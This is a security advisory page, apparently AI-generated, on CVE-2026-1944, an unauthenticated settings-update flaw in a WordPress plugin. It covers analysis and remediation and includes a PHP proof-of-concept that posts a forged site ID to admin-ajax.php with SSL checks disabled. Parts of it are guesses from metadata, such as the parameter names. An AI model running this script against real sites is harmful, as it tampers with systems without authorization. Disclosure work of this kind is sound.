Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1944: CallbackKiller service widget <= 1.2 – Missing Authorization to Unauthenticated Arbitrary Plugin Settings Update (callbackkiller-service-widget)

CVE ID CVE-2026-1944
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 1.2
Patched Version
Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1944 (metadata-based):
This vulnerability is a Missing Authorization flaw in the CallbackKiller service widget plugin for WordPress. The flaw resides in the `cbk_save()` function, which is exposed via the ‘cbk_save_v1’ AJAX action. It allows unauthenticated attackers to arbitrarily update the plugin’s site ID settings. The CVSS score of 5.3 (Medium) reflects an attack that is easy to execute, requires no privileges or user interaction, and results in low integrity impact with no confidentiality or availability loss.

Atomic Edge research identifies the root cause as a missing capability check on the `cbk_save()` function. This is a direct inference from the CWE-862 classification and the vulnerability description. The function is likely registered as an AJAX handler using `wp_ajax_nopriv_{action}` or `add_action(‘wp_ajax_nopriv_{action}’)`. This registration method bypasses WordPress’s standard authentication checks. The absence of a nonce verification or a user capability check like `current_user_can()` before processing the settings update request is the core failure. These conclusions are inferred from the CWE and standard WordPress plugin patterns, as the source code is unavailable for confirmation.

Exploitation involves sending a crafted POST request to the WordPress AJAX endpoint. The target is `/wp-admin/admin-ajax.php`. The attacker must set the `action` parameter to `cbk_save_v1`. The request must also include the specific parameter used by the plugin to store its site ID setting. Based on the function name and common patterns, this parameter is likely named `site_id` or `cbk_site_id`. An attacker would send a request with a malicious value for this parameter, which the vulnerable function would accept and save without validation.

Remediation requires adding proper authorization and security checks to the `cbk_save()` function. The fix must register the AJAX action using `wp_ajax_{action}` instead of `wp_ajax_nopriv_{action}` to enforce user authentication. The function should also implement a capability check, such as verifying the user has the `manage_options` capability. Adding a nonce check using `wp_verify_nonce()` for the incoming request is a standard security practice to prevent CSRF and ensure the request originated from an intended source. These measures would restrict settings updates to authenticated administrators only.

The impact of successful exploitation is unauthorized modification of the plugin’s configuration. While the description specifies modification of the site ID setting, the exact consequences depend on the plugin’s functionality. A manipulated site ID could disrupt the plugin’s core service, causing it to fail or connect to an attacker-controlled server. This could lead to denial of service for the plugin’s intended feature or data leakage if the plugin sends information to the forged ID. The vulnerability does not directly lead to privilege escalation, remote code execution, or site compromise, which aligns with the CVSS metrics of low integrity impact and no availability impact.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1944 - CallbackKiller service widget <= 1.2 - Missing Authorization to Unauthenticated Arbitrary Plugin Settings Update
<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// The vulnerable AJAX action as per the CVE description.
$ajax_action = 'cbk_save_v1';

// The parameter name is inferred from the plugin's purpose (site ID settings).
// Common naming conventions suggest 'site_id' or 'cbk_site_id'. We test both.
$parameter_candidates = ['cbk_site_id', 'site_id'];
$malicious_value = 'attacker_controlled_id';

foreach ($parameter_candidates as $param_name) {
    $post_data = [
        'action' => $ajax_action,
        $param_name => $malicious_value
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Bypass SSL verification for testing environments; remove in production.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo "Testing parameter: {$param_name}n";
    echo "HTTP Code: {$http_code}n";
    echo "Response: {$response}n";
    echo "------------------------n";

    // A successful exploitation attempt may return a 200 OK with a specific success message.
    // The exact response is unknown without the plugin, but a 200 status is a good indicator.
    if ($http_code == 200) {
        echo "Potential success with parameter: {$param_name}. Check plugin settings.n";
        break;
    }
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School